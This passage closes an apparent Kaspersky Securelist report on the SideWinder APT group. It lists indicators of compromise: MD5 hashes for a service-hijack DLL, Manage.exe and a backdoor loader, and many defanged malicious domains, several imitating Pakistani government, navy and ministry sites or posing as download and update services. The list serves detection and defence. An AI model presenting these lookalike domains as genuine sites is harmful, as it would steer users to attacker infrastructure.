<h3 id="syncbotservicehijack-dll">SyncBotServiceHijack.dll</h3> <p><a href="https://opentip.kaspersky.com/1be93704870afd0b22a4475014f199c3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______11527cb09939852d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1be93704870afd0b22a4475014f199c3</a></p> <h3 id="service-hijack">Service Hijack</h3> <p><a href="https://opentip.kaspersky.com/f840c721e533c05d152d2bc7bf1bc165/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7ff997d33f64e974&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">f840c721e533c05d152d2bc7bf1bc165</a> Manage.exe</p> <h3 id="backdoor-loader-devobj-dll">Backdoor Loader devobj.dll</h3> <p><a href="https://opentip.kaspersky.com/5718c0d69939284ce4f6e0ce580958df/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ddc4118daf33f574&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5718c0d69939284ce4f6e0ce580958df</a></p> <h3 id="domains-and-ips">Domains and IPs</h3> <p><a href="https://opentip.kaspersky.com/126-com.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7ca7f1adddad027a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">126-com[.]live</a><br /> <a href="https://opentip.kaspersky.com/163inc.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f4cb0cd7977ac30&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">163inc[.]com</a><br /> <a href="https://opentip.kaspersky.com/afmat.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f03d65a172ef0974&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">afmat[.]tech</a><br /> <a href="https://opentip.kaspersky.com/alit.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______84c5f580c401e22b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">alit[.]live</a><br /> <a href="https://opentip.kaspersky.com/aliyum.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c4c522ddbd29ace4&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">aliyum[.]tech</a><br /> <a href="https://opentip.kaspersky.com/aliyumm.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cdc030b896631d2a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">aliyumm[.]tech</a><br /> <a href="https://opentip.kaspersky.com/asyn.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1016a18c7fdf014f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">asyn[.]info</a><br /> <a href="https://opentip.kaspersky.com/ausibedu.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5bec1036358a94b2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ausibedu[.]org</a><br /> <a href="https://opentip.kaspersky.com/bol-south.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______65acce70e5f62bff&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">bol-south[.]org</a><br /> <a href="https://opentip.kaspersky.com/cnsa-gov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f6f9ce15dfc881da&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cnsa-gov[.]org</a><br /> <a href="https://opentip.kaspersky.com/colot.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______92cd059db8c72398&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">colot[.]info</a><br /> <a href="https://opentip.kaspersky.com/comptes.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a9d9e2db7fdb73f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">comptes[.]tech</a><br /> <a href="https://opentip.kaspersky.com/condet.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______002f2abdbb738f2e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">condet[.]org</a><br /> <a href="https://opentip.kaspersky.com/conft.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ae784f575c0525e2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">conft[.]live</a><br /> <a href="https://opentip.kaspersky.com/dafpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2c2ecc5d9eb4460d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dafpak[.]org</a><br /> <a href="https://opentip.kaspersky.com/decoty.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6124486df1f45cdc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">decoty[.]tech</a><br /> <a href="https://opentip.kaspersky.com/defenec.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5bd235c638b65a15&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">defenec[.]net</a><br /> <a href="https://opentip.kaspersky.com/defpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a51a20578894dbd6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">defpak[.]org</a><br /> <a href="https://opentip.kaspersky.com/detru.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______79395aedddc6d8fe&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">detru[.]info</a><br /> <a href="https://opentip.kaspersky.com/dgps-govpk.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1239fb0e6f6ae8c2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dgps-govpk[.]co</a><br /> <a href="https://opentip.kaspersky.com/dgps-govpk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef0b9fa383daf193&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dgps-govpk[.]com</a><br /> <a href="https://opentip.kaspersky.com/dinfed.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d9ad4ec1db09a12e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dinfed[.]co</a><br /> <a href="https://opentip.kaspersky.com/dirctt88.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______820e5b706c1d2d29&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dirctt88[.]co</a><br /> <a href="https://opentip.kaspersky.com/dirctt88.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3944e8ff48904e17&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dirctt88[.]net</a><br /> <a href="https://opentip.kaspersky.com/direct888.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______12287946f1c3af6d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">direct888[.]net</a><br /> <a href="https://opentip.kaspersky.com/direct88.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______903340547f9440b7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">direct88[.]co</a><br /> <a href="https://opentip.kaspersky.com/directt888.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0747de25b38ee8a6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">directt888[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwload-file.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______63ed30975862c08c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">donwload-file[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwloaded.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a1962a629a1f10f0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">donwloaded[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwloaded.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______704bd5ef39210923&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">donwloaded[.]net</a><br /> <a href="https://opentip.kaspersky.com/dowmload.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______46b2c15e028ac508&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dowmload[.]net</a><br /> <a href="https://opentip.kaspersky.com/downld.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1fbc1b89ede0dc83&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">downld[.]net</a><br /> <a href="https://opentip.kaspersky.com/download-file.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4bdbd18ec0d66843&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">download-file[.]net</a><br /> <a href="https://opentip.kaspersky.com/downloadabledocx.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______215e034441c5dd88&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">downloadabledocx[.]com</a><br /> <a href="https://opentip.kaspersky.com/dynat.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______16a7c168bc0a55d1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dynat[.]tech</a><br /> <a href="https://opentip.kaspersky.com/dytt88.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0dbd955db77de97e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dytt88[.]org</a><br /> <a href="https://opentip.kaspersky.com/e1ix.mov/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cddb607f9c6e91ad&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e1ix[.]mov</a><br /> <a href="https://opentip.kaspersky.com/e1x.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b0c4530879f657e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e1x[.]tech</a><br /> <a href="https://opentip.kaspersky.com/fia-gov.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______330c94ec385f4bc8&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">fia-gov[.]com</a><br /> <a href="https://opentip.kaspersky.com/fia-gov.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______34a00483274058a6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">fia-gov[.]net</a><br /> <a href="https://opentip.kaspersky.com/gov-govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______40c68b82f0b4f0b2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">gov-govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______44801aa00edbff9b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/govpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______26ebfc6dedd5e46d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">govpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/grouit.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______21a394cea51efb21&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">grouit[.]tech</a><br /> <a href="https://opentip.kaspersky.com/gtrec.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e60c51a953362e12&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">gtrec[.]info</a><br /> <a href="https://opentip.kaspersky.com/healththebest.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a1eb120494b867eb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">healththebest[.]com</a><br /> <a href="https://opentip.kaspersky.com/jmicc.xyz/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6884bb5a885004cf&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">jmicc[.]xyz</a><br /> <a href="https://opentip.kaspersky.com/kernet.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______76ff8c60bf4d6de5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">kernet[.]info</a><br /> <a href="https://opentip.kaspersky.com/kretic.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b81f4912a66cc080&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">kretic[.]info</a><br /> <a href="https://opentip.kaspersky.com/lforvk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______802aeceaf8efaf4d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">lforvk[.]com</a><br /> <a href="https://opentip.kaspersky.com/mfa-gov.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9aac0324133e84ba&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfa-gov[.]info</a><br /> <a href="https://opentip.kaspersky.com/mfa-gov.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b2a0603f9049402c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfa-gov[.]net</a><br /> <a href="https://opentip.kaspersky.com/mfa-govt.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______835d31e80d3f54b5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfa-govt[.]net</a><br /> <a href="https://opentip.kaspersky.com/mfacom.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______509741667beb9c03&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfacom[.]org</a><br /> <a href="https://opentip.kaspersky.com/mfagov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7d42b0209a55622d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfagov[.]org</a><br /> <a href="https://opentip.kaspersky.com/mfas.pro/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8b716d6be69e3b4b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mfas[.]pro</a><br /> <a href="https://opentip.kaspersky.com/mitlec.site/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8c4af46205df9c46&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mitlec[.]site</a><br /> <a href="https://opentip.kaspersky.com/mod-gov-pk.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6751dce5bbc207a5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mod-gov-pk[.]live</a><br /> <a href="https://opentip.kaspersky.com/mofa.email/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d67b1ace13a69f4e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mofa[.]email</a><br /> <a href="https://opentip.kaspersky.com/mofagovs.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2db6644d23fe660b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mofagovs[.]org</a><br /> <a href="https://opentip.kaspersky.com/moittpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e8fd45f2ecc180ac&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">moittpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/moittpk.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ac28e6e8fffcc504&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">moittpk[.]org</a><br /> <a href="https://opentip.kaspersky.com/mshealthcheck.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4231079b673d4d3e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">mshealthcheck[.]live</a><br /> <a href="https://opentip.kaspersky.com/nactagovpk.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ead1013d93e8be26&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">nactagovpk[.]org</a><br /> <a href="https://opentip.kaspersky.com/navy-mil.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______141ec9ee886ea779&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">navy-mil[.]co</a><br /> <a href="https://opentip.kaspersky.com/newmofa.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c20a690404e92062&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">newmofa[.]com</a><br /> <a href="https://opentip.kaspersky.com/newoutlook.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______796c069012b1c416&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">newoutlook[.]live</a><br /> <a href="https://opentip.kaspersky.com/nopler.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9b5cceb44707229c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">nopler[.]live</a><br /> <a href="https://opentip.kaspersky.com/ntcpak.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2661d780c462094e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ntcpak[.]live</a><br /> <a href="https://opentip.kaspersky.com/ntcpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fa0fcfe958ec54b0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ntcpak[.]org</a><br /> <a href="https://opentip.kaspersky.com/ntcpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______36cd7902b7b4de97&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ntcpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/ntcpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5337d66dcd389f61&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ntcpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/numpy.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7eccba7dbaf599b1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">numpy[.]info</a><br /> <a href="https://opentip.kaspersky.com/numzy.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______77b2c940bb18e742&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">numzy[.]net</a><br /> <a href="https://opentip.kaspersky.com/nventic.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d3a09ea3db8a4cce&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">nventic[.]info</a><br /> <a href="https://opentip.kaspersky.com/office-drive.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f824184e8a4e9891&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">office-drive[.]live</a><br /> <a href="https://opentip.kaspersky.com/pafgovt.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______63f9dcd26455e09c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pafgovt[.]com</a><br /> <a href="https://opentip.kaspersky.com/paknavy-gov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______88144d9f5daefc1b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">paknavy-gov[.]org</a><br /> <a href="https://opentip.kaspersky.com/paknavy-govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______87ab9c1b4c69bf15&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">paknavy-govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/paknavy-govpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______87655f15ef19c89e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">paknavy-govpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/pdfrdr-update.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c60685b07423b3ba&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pdfrdr-update[.]com</a><br /> <a href="https://opentip.kaspersky.com/pdfrdr-update.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8e8e2155acf5ee48&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pdfrdr-update[.]info</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bb2af66e07325644&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]com</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______537f2711a608a853&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]live</a><br /> <a href="https://opentip.kaspersky.com/pmd-office.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c28b659e222984c9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">pmd-office[.]org</a><br /> <a href="https://opentip.kaspersky.com/ptcl-net.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4a8e1c1be39ed002&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ptcl-net[.]com</a><br /> <a href="https://opentip.kaspersky.com/scrabt.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8eefdb2911408f6d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">scrabt[.]tech</a><br /> <a href="https://opentip.kaspersky.com/shipping-policy.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______202c724c77f34476&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">shipping-policy[.]info</a><br /> <a href="https://opentip.kaspersky.com/sjfu-edu.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f8af1e982f63600b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">sjfu-edu[.]co</a><br /> <a href="https://opentip.kaspersky.com/support-update.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eeca9d7aed803727&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">support-update[.]info</a><br /> <a href="https://opentip.kaspersky.com/tazze.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eb05660d9c8716df&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">tazze[.]co</a><br /> <a href="https://opentip.kaspersky.com/tex-ideas.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dfddbe30bc0c0d10&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">tex-ideas[.]info</a><br /> <a href="https://opentip.kaspersky.com/tni-mil.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d5e5522cce0c336d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">tni-mil[.]com</a><br /> <a href="https://opentip.kaspersky.com/tsinghua-edu.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f78e1279781ff12&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">tsinghua-edu[.]tech</a><br /> <a href="https://opentip.kaspersky.com/tumet.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eb509cb0c95ae931&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">tumet[.]info</a><br /> <a href="https://opentip.kaspersky.com/u1x.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7620935e4c4790da&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">u1x[.]co</a><br /> <a href="https://opentip.kaspersky.com/ujsen.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fedac9908fb2891a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ujsen[.]net</a><br /> <a href="https://opentip.kaspersky.com/update-govpk.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4224896f9fd0bebf&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">update-govpk[.]co</a><br /> <a href="https://opentip.kaspersky.com/updtesession.online/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0e4ae3bc1ff5ee6c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">updtesession[.]online</a><br /> <a href="https://opentip.kaspersky.com/widge.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f9dc7f2e189d4465&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">widge[.]info</a></p> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/backdoor/" class="c-link-tag"><span>Backdoor</span></a></li> <li><a href="https://securelist.com/tag/malware/" class="c-link-tag"><span>Malware</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/sidewinder/" class="c-link-tag"><span>SideWinder</span></a></li> <li><a href="https://securelist.com/tag/targeted-attacks/" class="c-link-tag"><span>Targeted attacks</span></a></li> <li><a href="https://securelist.com/tag/trojan/" class="c-link-tag"><span>Trojan</span></a></li> </ul> </div> <div class="c-article__authors u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/vasilyberdnikov/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vasily 